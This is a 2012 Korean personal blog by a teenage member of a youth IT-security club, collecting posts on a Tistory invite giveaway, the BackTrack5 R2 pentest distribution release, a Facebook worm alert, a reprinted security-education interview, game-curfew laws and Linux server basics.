Younge's Tistory Net

개방적이고 자유로운 티스토리! 10분에게 티스토리 초대장을 드립니다~

XoDNr_ 깝태 — Fri, 09 Mar 2012 23:36:22 +0900

i n v i t a t i o n

티스토리 초대장

안녕하세요!

티스토리에 보금자리를 마련하시려는 여러분께 초대장을 배포해 드리려고 합니다.

나만의, 내 생각을, 내 기억을 담는 소중한 블로그를 만들고 싶다면 티스토리로 시작해보세요!

티스토리 블로그는 초대에 의해서만 가입이 가능합니다. 원하시는 분은 댓글에 E-mail 주소를 남겨주시면 초대장을 보내드립니다. 남겨주실 때에는 꼭 비밀댓글로 남겨주세요!

초대장을 보내드리고 바로 개설하시지 않으신 분들은 초대장을 회수할 수도 있으니 바로 개설해주세요!

Yes

이런 분들께 드립니다!

1. 다른 블로그를 사용해보셨던 분

2. 이메일 주소가 정상적인 분

3. 블로그를 시작하려는 이유를 남겨주신 분!

이런 분들께 드리지 않아요!

1. 이메일 주소가 의심되는 분!

2. 이메일 주소를 남기지 않으신 분

3. 이유도 없이 달라고 하시는 분!

티스토리 이래서 좋아요!

1. 이미지, 동영상, 오디오, 파일까지! 무한 용량과 강력한 멀티미디어를 올릴 수 있어요!

2. 스킨위자드로 스킨을 내맘대로~ 거기에 기능 확장 플러그인까지!

3. 내가 원하는대로 myID.com으로 블로그 주소를 만들 수 있어요!

지금 시간이 약간 늦은 시간이니 지원시간은 내일, 토요일 오전 11시까지 댓글을 달아주신 분들을
중점으로 해서 초대장을 선물해드리겠습니다.
선착순으로 드리는것은 절대 아니며 얼마나 성의있게 작성하였는지, 목적이 뚜렷한지를 초점을 두고 초대장을 드리겠습니다.
물론 선착순이 아무런 반영이 안되는건 아닙니다.

첫번째로 쓴 사람과 세번째로 쓴 사람이 있는데 두 분다 완벽하게 썼다면 첫번째분에게 줄수 밖에 없겠죠,
그러면 많이들 부탁해주세요~~~~ 친절하게 아낌없이 드릴께요 ㅎㅎㅎㅎㅎㅎ

(추가 : 중간에 글을 정말 열심히 써주셨다~ 라는 분이 계시면 바로 드리겠습니다 ^^ )

모의해킹 OS! BackTrack5 R2 버전 릴리즈!

XoDNr_ 깝태 — Sun, 04 Mar 2012 12:11:06 +0900

BackTrack5 R2 Released : http://www.backtrack-linux.org/backtrack/backtrack-5-r2-released/
BackTrack5 R2 Download : http://www.backtrack-linux.org/downloads/

BackTrack5 R2 버전이 나왔습니다. 이번 버전은 R1 에 비해 커스터마이징된 OS로 교체되었으며 데이터마이징된
Maltego 3.1.0 툴이 추가되었으며 사용하였으며 Metasploit 이외 여러 툴이 업데이트 되었습니다.

저는 백트랙을 처음 사용하게된 계기가 예전에 한창 네트워크에 잔깐 관심을 가졌을때 공부도 안하고선 와이파이
패스워드 크래킹에만 관심을 가져 백트랙을 사용하게 되었는데 지금 보니 그 이외에도 무궁무진한 공격이 가능하더군요
백트랙을 이용한다고 무조건 스크립트 키디는 아닙니다, 이 어렵고 많은 툴 들을 잘 사용하고 원리를 잘 공부하기만 해도
상당히 좋다고 생각됩니다. 현재는 책도 나와있으니 한번 관심있으신분들은 책을 보면서 해보면 재밌을것같습니다.

BackTrack은 Slax라는 전통적인 라이브 리눅스를 기본으로 사용하다가 최근 버전에서는 우분투를 이용하여 제작되어 배포되고 있는 모의침투 테스트를 하기 위해 제작된 라이브 OS입니다.
( 라이브 CD란 저장디스크에 별도의 설치 없이 이동식 디스크(CD, USB 등)을 통해서 바로 부팅이 가능합니다. 단, 부팅한 뒤에 설정하였던 모든 값은 종료를 하게 되면 사라지게 됩니다. (휘발성))

여기서 백트랙을 이용한 모의침투 테스트란 여러 취약점 진단을 얘기합니다. 백트랙에 설치되어 있는 유명한 툴로는
Metasploit, Zenmap, OpenVAS, hping, cain & abel, tcpdump, Netcat 과 같은 툴이 있으며 몇 가지만 설명하겠습니다

(1) Metasploit : 설정한 타겟 호스트의 취약점을 찾아내고 침투방법을 제공하는 자동화 프로그램입니다. 일단 취약점
진단 프로그램으로는 제일 유명하며 현재까지도 아마 가장 많은 강의가 쓰여졌을겁니다.

(2) Zenmap : 상대 호스트의 네트워크를 스캔 할 경우 하나의 호스트에 대한 정보를 보여줄 뿐만 아니라 네트워크의 모든 호스트에 대한 정보를 스캔합니다. 또한 토폴로지 맵을 만들어줍니다.

(3) OpenVAS : 네트워크 스캔 이외에도 모든 스캔이 가능한 프로그램입니다. 세팅이 약간 까다롭긴 하지만 항상 최신 버전으로만 업데이트가 되어있으면 가능합니다. (웹으로도 스캔 가능)

이번 BackTrack5 R2 버전에서는 다음의 툴 들이 업데이트 되었습니다.

Arduino, bluelog, bt-audit, dirb, dnschef, dpscan, easy-creds, extundelete, findmyhash, golismero, goofile, hashcat-gui, hash-identifier, hexorbase, horst, hotpatch, joomscan, killerbee, libhijack, magictree, nipper-ng, patator, papal, pyrite, reaver, rebind, rec-studio, redfang, se-toolkit, sqlsus, sslyze, sucrack, thc-ssl-dos, tlssled, uniscan, vega, watobo, wcex, wol-e, xspy

기존 R1 버전을 사용하던 분들은 다음의 명령을 통해 바로 업데이트가 가능합니다.

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list

apt-get update

apt-get dist-upgrade

YIS 온라인 부팀장 김태욱 기자

xodnr631@naver.com

클라우드 서비스 종류

XoDNr_ 깝태 — Sat, 03 Mar 2012 23:40:00 +0900

출처 - http://elrua999.tistory.com/2876

이번에 교과부에서 대학에서 사용금지시킨 클라우드서비스 종류 생각보다 많네 안쓰던것도 있고

SK텔레콤 T클라우드(www.tcloud.co.kr)
T클라우드비즈(www.tcloudbiz.co.kr)
다음클라우드(cloud.daum.net)
LG CNS 마이클라우드(cloud.lgcns.com)
클라우드미(www.cloudme.com)
애플 아이클라우드(www.icloud.com)
틸론 엘클라우드(www.elcloud.com)
아이슛(www.ishoot.co.kr)
HTC센스(www.htcsense.com)
아이슛클라우드(www.ishootcloud.com)
스팟클라우드(www.spotcloud.com)
B드라이브(www.bdrive.com)
유자드팝(www.uzardpop.com)
포고플러그(www.pogoplug.com/ko/)
싱크아이(www.synci.co.kr)
싱크아이모바일(m.synci.co.kr)
아마존 웹서비스(aws.amazon.com) -
씨투게더(www.seetogether.com)
오라클 퍼블릭 클라우드(cloud.oracle.com)
올레 유클라우드(ucloud.olleh.com)
올레 유클라우드비즈(ucloudbiz.olleh.com)
클리엘 클라우드(cloud.cliel.com)
제로PC(www.zeropc.com)
사운드클라우드(soundcloud.com)
올레오피스365(office365.olleh.com)
센클라우드(cencloud.com)
우리나(www.woorina.com)
구글 독스(docs.google.com)
에버노트(www.evernote.com)
씽크프리(www.thinkfree.com)
페이스북 독스(docs.com)
스프링노트(www.springnote.com)
다우기술 오피스톡(www.officetalk.co.kr)
LG유플러스 웹하드 웹오피스(www.webhard.co.kr)
후이즈데스크(whoisdesk.net)
나모 액티브스퀘어 웹편집기(www.namo.co.kr) -
네이버 N드라이브(ndrive.naver.com)
PB웍스(pbworks.com)
베이스캠프(basecamphq.com)
팀오피스(www.teamoffice.com)
슈가싱크(www.sugarsync.com)
유플러스박스(www.uplusbox.co.kr)
MS 윈도라이브 스카이드라이브(skydrive.live.com)
데이터파일호스트(www.datafilehost.com)
애플 아이워크(www.iwork.com)
MS 오피스365(www.office365mobile.co.kr)
티나루(www.tnaru.net)
조호(www.zoho.com)
MS 오피스2010 웹앱스(office.microsoft.com/ko-kr/products/)
허들(www.huddle.com)

YIS 온라인팀원으로 참가한 데일리시큐와 동아일보 인터뷰!

XoDNr_ 깝태 — Sun, 26 Feb 2012 04:38:41 +0900

신기한건 전혀 의도하지 않았음에도 불구하고 인터뷰 두번받을때 제가 제일 강조받는건
속초에서 왔다는겁니다. 출신지역도 유명세를 탈지는 저도 몰랐습니다.

#1 데일리시큐 인터뷰

기사 링크 : http://www.dailysecu.com/news_view.php?article_id=1700
기사가 정말 멋있게 잘 쓰였습니다, 감사합니다. 길민권 기자님

#2 과학동아 인터뷰

저희 YIS팀과 런치킨팀이 맺은 정식 KSIA 연맹을 홍보하는 시간이 되었습니다. 기사는 5월 호에 좀 늦게 실리는
감이 없지 않아 있지만 오랜만에 팀원 전체가 모여 떠들 수 있었던 즐거운 시간이였습니다.

페이스북을 통한 신종 웜 전파 중! 24일 기준 국내 백신 진단불가능

XoDNr_ 깝태 — Sat, 25 Feb 2012 04:41:49 +0900

최근 신종 페이스북 웜이 등장해 페이스북 채팅창을 통해 웜이 퍼지고 있는데
24일 기준으로 아직 이 신종 웜을 국내/외 백신에서 잡아내지 못하여 큰 문제를 삼고 있습니다.

이 백신은 페이스북에서 친구계정으로 "Nice photo ~~~ (link) ~~" 라는 영문메세지와 링크가 담긴 메세지가 함께
날라오며, 이 대화에서 아무 거리낌 없이 링크를 실행하게되면 압축파일을 다운받고 압축을 풀게되면 com 확장자의
악성파일이 실행되는데 문제는 친구이름으로 똑같이 날라온다는건데 이게 아직 발견된 피해는 없지만 자신의
계정이 해킹당해 동일 메세지를 자신의 친구들에게 또 전달한다고 합니다.

또 페이스북 이외 야후 메신저, 구글톡으로 친구에게 동일한 메세지가 전송된다고 합니다.
어떤 피해가 일어났는지 아직 확인불가능 하지만 앞으로 이렇게 계속 퍼지면 예측할 수 없는 비상사태가
일어날거라고 예상하고 있으니 비슷한 상황이 발생하면 파일을 다운받으려고 하지 마시는걸 권유합니다.

이러한 페이스북 웜은 대표적으로 201년 9월 당시에도 유행한 적이 있었는데 쿡페이스 웜 변종 바이러스로 쪽지로
대량유포 되었던 사례가 처음이라 매우 유명했었던 웜이었습니다. 내용이 Hello, Hi, Cool + 바이러스 URL 로 이루어진
악성메일이 쪽지로 대량발송되어 확인하는경우 감염이 되어 사용자 개인정보가 유출되었습니다.

이 밖에 PC를 좀비 PC로 만들어 분산서비스거부(DDOS) 공격에 이용되는 변종 웹 바이러스도 발견되고 있습니다.
최근에 SNS 사용자가 점점 늘어나면서 각종 보안업체에서는 SNS 보안위협 증가를 경고하였습니다.

개인적으로 이런 부분은 백신에서 바로 잡지도 못하고 어떻게 바로 처리가 안되는 경우니깐 사람들의 좀 더 많은
보안에 대한 관심이 많아야 된다고 생각합니다. 만약 사람들이 "해킹? 괜찮겠지 설마~" 하는 생각을 하지고 인터넷을
사용하면 아무리 우리나라 보안업체가 발전한다 하더라도 한국 IT 는 발전할 가능성이 없다고 생각합니다.

YIS 온라인 부팀장 김태욱 기자
xodnr631@naver.com

[데일리시큐] 어른들에게 던지는 한마디 “지금 뭐하세요?”

XoDNr_ 깝태 — Fri, 17 Feb 2012 02:32:37 +0900

우연히 YIS 팀의 온라인 부팀장 자리를 맡게되었는데 기사까지 함께 나오게 되었습니다.

링크 : http://www.dailysecu.com/news_view.php?article_id=1700

----------------------------------------------------------------------------------------

[인터뷰] 청소년 IT보안 스터디 그룹 YIS와 런치킨
보안을 비롯해 IT 전 분야에 대한 청소년 스터디 그룹
“보안 교육받을 곳 거의 없어…그렇다면 우리가 앞장설 것!”

세상은 그래도 살만하다는 생각이 드는 일들이 살다보면 한번씩 있다. 그래서 아직은 희망이 있다고 말하고 싶다. 청소년 IT보안 스터디 그룹인 ‘YIS(Youth IT Study)’ 그리고 ‘런치킨’ 맴버들과 15일 한국MS 미팅룸에서 만났다.

YIS는 비공식적으로 지난해 1월에 결성했으며 공식적인 활동은 지난해 6월부터 시작했다. 모두 8명이 회원이며 IT보안에 대해 온-오프라인 상에서 토론도 하고 기사도 작성하면서 청소년들의 올바른 보안문화 형성과 IT계몽에 앞장서고자 결성된 청소년 스터디그룹이다.

또 이날 런치킨 동아리 맴버도 같이 만날 수 있었다. 런치킨도 청소년 IT동아리로서 IT에 관심이 많은 고등학생들이 일주일에 2회 모여 자신이 좋아하는 분야에 대해 서로 의견도 교환하고 토론도 하고 C언어 등에 대해 같이 공부도 하는 모임이다. 이들의 주요 토론 주제로 다루는 이슈는 정보보안뿐만 아니라 게임, 프로그래밍 등 다양한 IT영역을 넘나들고 있다. 한편 YIS동아리와 런치킨 IT동아리는 보다 적극적인 IT계몽을 위해 상호 노력하자는 의미에서 연맹을 맺고 협력하고 있다.

다음은 YIS와 런치킨 동아리 맴버들과 나눈 대화 내용이다. 학생들이 말한 내용들을 가감없이 전달하도록 하겠다.

<좌측부터 김시우, 최광준, 이규형, 강모대, 김태욱 학생>

-강모대=(20살. 컴퓨터 보안 프로그래밍에 관심이 많은 학생이며 부평고를 졸업하고 한국기술교육대학교 입학예정)YIS는 IT에 관심이 많은 학생들의 동아리다. 온라인과 오프라인 팀원을 나눠 활동하고 있다. 온라인은 한주에 한번씩 각자 IT관련 기사를 작성하고 있으며 연말에는 기사들을 취합해 IT잡지를 만들 계획이다. 오프라인 모임은 한달에 한번 정기적으로 모여 한가지 주제를 정하고 주제와 관련된 발표와 토론형식으로 진행하고 있다.

또 전국적으로 IT계몽 운동을 하기 위해 올 1월에 런치킨과 연맹을 맺었으며 추후에는 전국 IT동아리 연맹을 결성해 IT계몽운동에 더 많은 학생들이 동참할 수 있도록 만들어 갈 계획이다.

특히 런치킨과 같이 준비하는 것이 UCC 제작이다. 청소년 뿐만 아니라 가계각층의 국민들에게 IT에 대한 올바른 가치관과 보안의 중요성을 전달하기 위해 UCC를 제작할 계획이다. 이 부분은 김시우 팀원이 총괄하고 있다.

-김시우=(18살. 수도전기공고 재학중. 보안과 멀티미디어분야에 관심) UCC를 만드는 목적은 보안에 대한 전문지식을 가지고 있는 사람들뿐 아니라 보안계몽이 필요한 각계각층의 사람들에게 우리의 뜻을 전달하기 위해서다. 네이트 해킹 이후 비밀번호를 변경하라고 했음에도 불구하고 여전히 많은 사람들이 비밀번호를 변경하지 않고 있다. 또 유출된 개인정보들이 게임사이트에 도용되고 있는 상황이다.

이렇게 되는 데는 두가지 이유가 있다고 생각한다. 하나는 사용자들의 보안의식이 너무 부족하기 때문이다. 또 하나는 정확한 보안관련 정보를 받을 기회가 없기 때문이라고 생각한다. 그래서 UCC를 통해 해킹을 당하면 어떤 피해를 입게되고 또 해킹을 당하지 않기 위해서는 어떻게 준비해야 하는지, 스마트폰을 안전하게 사용하기 위해서는 어떻게 해야하는지 등을 주제로 UCC연작을 만들 계획이다.

UCC제작은 동아리 회원들이 주인공이 될 것이고 배포는 안랩 V3 블로그나 유투브 등 다양한 소셜 사이트를 통해 배포하겠다. 또 모든 연령층이 공감할 수 있도록 쉽고 재미있게 제작할 예정이다. 현재 이 작업을 위해 맴버들이 계속 토론을 진행중이다.

(기자=정부에서 할 일을 우리 학생들이 이렇게 고민하고 있구나. 대견하면서도 제대로 못하고 있는 기성세대중 한사람으로 부끄러움.)

-이규형=(18살. YIS 팀장. 안양평촌고 2학년 재학중. 컴퓨터 보안과 DDoS 공격에 관심) 보안에 관심이 많은 학생이다. 안랩에서 진행하는 V스쿨을 6기까지 참여했다. 안랩의 경우 700여명의 직원이 매일 12만개씩 만들어지는 신종 악성코드를 분석하고 막기엔 역부족이라는 말을 들었다. 분석을 못해 업데이트되지 못한 많은 악성코드들이 누적되면서 인해 공격을 받고 있다고 생각한다. 정부는 이런 상황인데도 정보보안이 중요하다고 말만하고 인력양성이나 인프라 구축에 투자를 하지 않는 것 같다.

(기자=방통위원장이나 KISA 원장을 모셔와 이 학생들의 답답한 심정을 한번 들어보라고 하고 싶을 정도였음.)

-최광준=(19살. 런치킨 팀장. 서울양정고 3학년 재학중. 컴퓨터 보안과 시스템 운영쪽에 관심) 모바일에 대한 보안인식도 많이 부족한 것 같다. 스마트폰 사용 인구가 기하급수적으로 늘어나고 있는데 많은 사람들이 보안은 생각하지 않고 탈옥이나 루팅을 하고 있다. 이런 행위들이 보안에 어떤 영향을 미치는지 모르고 있다. 이런 경우 스마트폰 내의 개인정보가 쉽게 유출될 수 있으며 좀비화된 스마트폰을 이용해 대규모 DDoS 공격도 가능하다는 것을 청소년들이 모르고 있다. 이런 부분을 우리 동아리가 계몽해 나갈 것이다.

바이러스와 같은경우 러시아에서 개발하고 중국에서 다양한 변종이 만들어지며 결국 우리나라에서 테스트를 한다고 들었다. 그런데도 우리나라는 아직 보안인력도 부족하고 정부의 지원도 없는 것 같다. 특히 많은 청소년들은 PC나 스마트폰 등을 친숙하게 사용하고 있으면서도 어떻게 보안을 해야하는지 모르고 있다. 교육이 필요한데, 대부분 보안컨퍼런스나 세미나는 상업적인 것들이고 일반 학생들에게 보안교육을 하는 경우는 거의 없는 것이 문제라고 생각한다. 이런 교육만 적극적으로 이루어져도 사용자들의 보안상태는 지금보다 훨씬 좋아질 것이라고 확신한다.

(기자=대부분 돈벌자고 보안 컨퍼런스나 세미나 열고 있는 기업들과 매체들은 각성해야 한다. 하긴 이런 부분은 사기업들이 하긴 힘들 것이고 정부차원에서 보다 적극적으로 이루어져야 한다.)

-이규형=보안관련 대형 사건 사고들이 많이 발생하는데 이제 웬만한 사건은 무감각해진 것 같다. 얼마전 네이버에서 바이러스를 유포하고 해킹툴을 팔고 있는 카페를 발견하고 경찰에 신고를 했는데 돌아오는 답변은 네이버에서 해당 카페를 접근 차단해서 수사를 못하겠다는 것이었다. 경찰이 의지만 있다면 네이버에 협조를 받아 카페운영자를 충분히 조사할 수 있었다고 생각한다.

특히 그 바이러스는 'Death Hard'라는 이름의 파일에 숨겨져 있었으며 사용자들이 이 악성파일을 실행할 경우 윈도우 인식이 안되는 문제를 유발하고 있었다. 실제 실행해 본 결과 XP의 경우 블루스크린과 함께 재부팅시 OS부팅이 불가했고, 윈도7의 경우 모든 데이터 읽기 쓰기가 작동되지 않고 컴퓨터를 정상 종료해도 종료되지 않으며 재부팅시 OS부팅 불가현상이 발생했다. 무엇보다도 이 바이러스는 AVG를 제외한 국내외 어떤 백신도 탐지하지 못한다는 것을 확인했다. 크래커가 아이콘이나 파일이름을 바꿔 재배포할 경우 심각한 문제를 유발할 수 있는 바이러스였다. 그래서 국정원에 신고했다.

현재 각종 포털에 이런 바이러스와 해킹툴을 유포하는 경우가 상당히 많다. 그런데도 경찰이나 정부는 이에 대한 대책도 없이 카페차단만 하고 있으니 계속 그런 카페가 만들어지고 있다고 생각한다.

-김시우=옥션 사건 이후 뭔가 바뀔줄 알았는데 전혀 바뀌지 않은 것 같다. 여러 대형 사건으로 개인정보가 유출되면서 학생인 나한테도 대출문자가 오고 있다.

(기자=중학생인 우리 딸에게도 대출문자가 오는데 고등학생들에게도 당연히…)

-최광준=아이들부터 청소년까지 대부분 컴퓨터를 많이 사용하고 있다. 하지만 사회에서나 학교에서나 컴퓨터를 안전하게 사용하는 방법에 대해서는 거의 교육 받을 곳이 없다. 런치킨동아리를 만든 목적도 바로 교육받을 곳이 없으니 우리들 스스로 해결해보고 우리의 지식을 다른 친구들과 공유하기 위해서다. 컴퓨터 안전 교육은 성인들도 필요하지만 우리 청소년들에게 더 필요한 교육이라고 생각한다. 학교에서도 교과서 제일 끝부분에 정보화사회 장단점만 잠깐 나오고 끝이다. 정부차원에서 청소년들에게 안전한 컴퓨터 사용에 대한 지속적인 교육을 실시한다면 지금보다 우리 사회의 보안수준이 더욱 높아질 것이다.

-김태욱=(18살. 강원도 속초고 2학년 재학중. 컴퓨터 전반과 시스템 해킹 공부중) YIS 온라인 모임을 책임지고 있다. 지방에 있어 한 곳에 모이기 힘든 학생들이 온라인에서 자신의 블로그와 카페 그리고 V스쿨에 1주일에 1건 이상 정보들을 올린다. 또 올라온 글 중에 자기 주관적 생각을 잘 표현한 좋은 글들은 선별해서 연말에 잡지로 만들어 배포할 계획도 가지고 있다. 그래서 많은 학생들이 맴버들의 글을 보고 도움이 되었으면 하는 바람이다.

한국은 자칭 IT강국이라고 말한다. 인터넷 속도와 스마트폰 보급률, 삼성과 LG와 같은 대형 모바일 제조사들이 있어 그런 것 같다. 하지만 그동안 신경쓰지 못했던 보안문제가 계속 터지면서 보안의 중요성도 커지고 있지만 여전히 일반인들은 관심이 부족하다고 생각한다.

언론 기사들도 보면 해커(취약점을 찾아 보안에 도움을 주거나 순수한 연구자)와 크래커(사이버 범죄자), 해킹과 크래킹의 차이도 모르고 기사를 쓰는 것 같다. 그래서 컴퓨터 해킹 공부를 한다고 하면 어른들이 싫어한다.

또 정부는 항상 사건이 터지면 대책을 내놓거나 법을 만든다. 피해를 당하고 난 뒤에 대책을 마련하는 것보다 선행적인 보안이 이루어질 수 있도록 평상시에 교육과 인재양성, 투자 등이 이루어졌으면 좋겠다. 독일은 일반 가정에서 와이파이를 사용할 때 별도의 비밀번호를 지정하지 않으면 벌금이 500만원이라고 들었다. 이런 작은 부분까지 정부의 손길이 미쳐야 사회 전반적인 보안문화가 자리 잡을 수 있을 것이다. 정부의 노력이 필요하다. 우리의 힘이 아직은 미약하지만 도화선이 될 수 있도록 열심히 노력할 것이다.

이외에도 학생들은 사이버상에 문제가 생겨 KISA나 경찰 등에 신고를 하고 싶어도 절차가 너무 어렵다고 토로했다. 또 요즘 이슈가 되는 셧다운제에 대해 토론을 한 후 여가부에 전화를 해 왜 셧다운제를 시행했냐고 물어봐도 논리적인 설명도 없이 “그냥 법이니깐 무조건 따라라”는 식이어서 실망스웠다고 한다.

그리고 해킹으로 경찰 조사를 받는 학생들이 대부분 “이게 죄가 되는지 몰랐다”고 말하는 것은 그만큼 교육이 부족했기 때문이라고 지적했다. 더불어 학생들이 컴퓨터 보안과 보안의 중요성을 배울 수 있는 곳이 해커스쿨에서 개최하는 해킹캠프와 안랩의 V스쿨 밖에 없다고 아쉬워했다. 정부에서 각급 학교에 지원을 해줘서 학교별로 이런 캠프가 열렸으면 좋겠다고 한목소리를 냈다.

또 YIS가 청소년 동아리이기 때문에 대학을 진학하면 회원이 될 수 없다. 하지만 대학을 가서도 대학에서 이와 같은 동아리를 만들어 현재 청소년 동아리와 연맹을 맺어 지속적인 활동을 해나가겠다고 다짐했다.

-기자의 생각=기자는 놀랐다. 이렇게 사회를 위해 고민하고 올바른 사고방식을 가진 청소년들이 의외로 많다는 것을 이번 기회에 새삼 느끼게 됐다. 솔직히 인터뷰 전에는 도대체 어떤 의견들이 나올지 내심 걱정스럽기도 했지만 인터뷰를 진행하면서 이 학생들의 진정성과 의지가 또렸이 느껴져 참 기분이 흐뭇해졌다.

이 학생들은 기성세대들이 해주지 않는다면 우리가 나서서 하겠다는 의젓한 포부를 가지고 있다. 정부, 방통위, KISA, 기업, 학교, 언론 모두가 이들에게 미안해 해야한다. “그래도 우리 나름대로 했는데…”라고 말하지말자. 모두 형식적이었고 보여주기식 혹은 성과내기 혹은 생색내기 혹은 돈벌이를 위한 퍼포먼스가 아니었는가 말이다. 보안을 ‘그들만의 리그’로 만들지 말자. 인터뷰 내내 기기자 느낀 것은 “(답답하다는 어투로)어른신들 지금 도대체 뭐하세요?!”였다. 이 학생들이 말하는대로 보안이 사회 전반에 뿌리내릴 수 있도록 만들어가는 것은 이 학생들의 몫이 아니라 우리의 몫이다.
[데일리시큐=길민권 기자]

[저작권자 ⓒ데일리시큐 무단 전재-재배포 금지]

셧다운제도와 쿨링오프제, 과연 올바른 방법일까?

XoDNr_ 깝태 — Mon, 13 Feb 2012 17:02:28 +0900

저의 주관적인 생각이 많이 들어갔으며 중립적인 위치보단 제 의견을 많이 첨부해 작성했습니다.
최근 IT 이슈를 두고 이슈에 대한 정확한 내용과 제 의견을 담는 기사입니다.

셧다운제도란, 16세 미만의 청소년에게 심야시간의 인터넷 게임 제공을 제한하는 제도이다. 셧다운(shutdown)제의 골자는 ‘16세 미만의 청소년에게 오전 0시부터 오전 6시까지 심야 6시간 동안 인터넷 게임 제공을 제한한다’는 것이다. 인터넷게임을 서비스하는 업체들은 이 시간대에 연령과 본인 인증을 통해 청소년 게임 이용을 강제로 원천차단해야 한다.

쿨링오프제란, 게임에 처음 접속 후 2시간 이후 강제로 접속이 종료되고 10분후 1번에 한하여 다시 접속이 가능한 제도입니다.

여성부에서 운영하는 셧다운제도와 교육과학기술부에서 추진하고 있는 쿨링오프제 입니다. 셧다운제는 16세 미만의 청소년들이 게임을 계속 하는 경우 12시에 게임이 강제종료 되며 쿨링오프제는 설명되어있는 그대로 게임에 접속하면 2시간, 그리고 1번의 재접속 즉 하루에 게임을 4시간 할 수 있게하는 제도입니다.

시행 전은 물론 첫날부터 말이 많았던 셧다운제에 이어 쿨링오프제 또한 청소년들의 많은 반발을 불러오고 있는 가운데,
이번 쿨링오프제 시행에 대해서는 게임업계들이 직접 반대의견을 내세우고 있습니다, 대한민국에서 청소년 들이 할 수 있는 게임은 온라인게임 뿐만이 아닙니다, 수입게임들도 자리잡고 있으며 오히려 온라인게임들보다 더 폭력적인 게임들이 많습니다. 만약 이대로 계속 시행이 된다면 현재 발전하고 있는 대한민국 게임산업은 엄청난 타격을 받을것이며 남아있던 외국 게임업계들도 시간이 지나면 모두 한국을 기피하고 게임산업이 망할 가능성 또한 있습니다.

http://game.inews24.com/php/news_view.php?g_serial=636430&g_menu=020500&rrf=nv
http://www.mdtoday.co.kr/mdtoday/index.html?no=177308
http://esports.dailygame.co.kr/news/read.php?id=56062

=> 게임업계들은 물론 국회의원들, 청소년들뿐만 아니라 많은 분들이 셧다운제와 쿨링오프제에 대한
비판적인 시각을 가지고 있습니다.

이명박 대통령의 기사입니다. http://www.dt.co.kr/contents.html?article_no=2012020602010531749001

또 정부에서 이런 제도를 시행하는 이유 중 가장 큰 이유는 학교폭력에 있습니다. 요즘 문제가 많은 청소년들의 학교폭력 문제, 자살과 관련된 많은 일 들을 점점 게임과 연관시키고 있다는 것입니다. 그런데 너무 학교폭력과 게임을 연결지어 문제입니다. 이번 셧다운제와 쿨링오프제를 시행하면서 비용만 몇십억이 되는것으로 알고있습니다. 그런데 과연 그런 거금을 들여 온라인게임을 막는다고 학교폭력이 줄어들까요? 오히려 부모님의 주민등록번호를 이용해 게임아이디를 만드는 청소년들만 늘어날것이며 더불어 주민등록번호 도용사태까지 발생할 수 있습니다. 그리고 게임중독에 심각한 아이들은 어떤 일을 벌일지 모르게됩니다.

차라리 대한민국의 IT 성장의 주동력인 게임산업을 망치는것보단 거금을 들여 지금 하고있는것보다 더욱 많은 노력을 들여 청소년들을 위한 컨텐츠를 많이 만들어야 한다고 생각합니다. 학교폭력 예방 동영상 제작이라던가 보안에 노력을 한다던가 중독 예방 캠프와 같은 컨텐츠를 더 많이 만드는방법이 큰 성과는 이루지 못하더라도 단순히 게임하는것을 막음으로써 많은 반발을 일으키는 것보단 많은 도움이 될거라 생각합니다.

YIS 온라인 부팀장 김태욱 기자
xodnr631@naver.com

컴퓨터로 카카오톡을 하자!

XoDNr_ 깝태 — Sat, 04 Feb 2012 18:49:09 +0900

아이팟터치를 수리맡겼는데 오히려 메인보드 고장이 나는 바람에 사용을 못 하는 관계 상
어떻게 하면 PC판 카카오톡, 컴퓨터로 카카오톡을 할 수 있을까 궁금해 검색을 하는 도중 VMware 에 안드로이드를
직접 설치하고 구축하여 컴퓨터에서 PC 카카오톡을 즐길 수 있는 방법이 여러개 있더군요,

그래서 저도 이런저런 글 보면서 여러개 시도해보니깐 되긴 되길래 약간의 불편함도 있지만 재밌는것 같아서~
필요하신 분들을 위해 강의를 쓰려고 합니다, 올리면 잘 봐주시면 감사하겠습니다~

리눅스 서버 유형별 개념정리

XoDNr_ 깝태 — Sun, 23 Oct 2011 00:41:15 +0900

출처 - 되게 오래전에 찾았다가 제가 약간수정한것 같은데 정확한 출처를 모르겠네요 ㅠ

리눅스의 여러 서버 종류인 네임서버, 웹서버, 메일서버, FTP 서버, NFS 서버, 데이터베이스 서버 등
여러 서버들은 꼭 리눅스에서만 구현되는 것은 아닙니다.

네임서버는 흔히 DNS 라고 말하는 시스템을 말하는 것으로써 우리가 iyounges.org 를 웹 브라우저에 입력하고 이동을
눌렀을때 컴퓨터는 iyounges.org 를 DNS 서버에 해당 서버의 IP 를 물어봐서 그 IP 주소를 가져와서 실제 접속은 IP 로
접속을 하게끔 만들어주는 시스템 입니다. 즉 이름을 IP 로 변환해주거나 IP 를 이름으로 변환해주는 시스템 입니다.

웹서버는 흔히 알고있듯이 홈페이를 만들어 웹에서 서비스를 하게 만드는 시스템입니다. 발전해오면서 보안이 중요해지면서
로그인 서비스를 사용하게 되었고 포털사이트는 컨텐츠를 대중에게 알리기 위한 용도로 사용되었습니다.
현재는 제로보드와 같은 편하게 웹을 제작할 수 있는 방법이 많이 생겨 진화도 훨씬 빨라지고 있습니다.

메일서버는 메일을 주고 받는 서버입니다. 대표적으로는 sendmail, Qmail 이 대표적입니다.

FTP 서버는 File Transfer Protocol 로써 파일을 전송하기 적합한 하나의 프로토콜 입니다. 현재는 대용량 파일 전송이나
기업과 개인의 파일 전송의 용도로 많이 쓰이고 있으며 리눅스에는 Proftp, Vsftp 와 같은 FTP 서버 프로그램이 있습니다.

NFS 서버는 Network FileSystem 의 약자로써 네트워크상에서 다른 호스트의 파일시스템(하드디스크)을 마치 자신의
것 처럼 읽고 쓸 수 있는 시스템 입니다. 클러스터링 기법에도 도임이 되며 근본적으로 메인 서버의 부화를 줄이기위해 다른 서버을 빌려 쓴다고 생각하시면 됩니다. 오직 유닉스 리눅스 상에서만 가능한 프로그램 입니다.

SAMBA 는 리눅스 시스템이 윈도우와의 파일 공유를 위해 쓰이는 프로그램 입니다. 윈도우는 파일공유 프로토콜이 리눅스와 틀리기 때문에 이 둘 간의 공유를 위해 상대방의 프로토콜을 인식할 수 있는 프로그램이 필요한데 그런 역할을 하고 있습니다.

해커스쿨 Linux FTZ 서버 직접 구축해보는 방법

XoDNr_ 깝태 — Sun, 16 Oct 2011 13:18:02 +0900

링크 : http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=1871

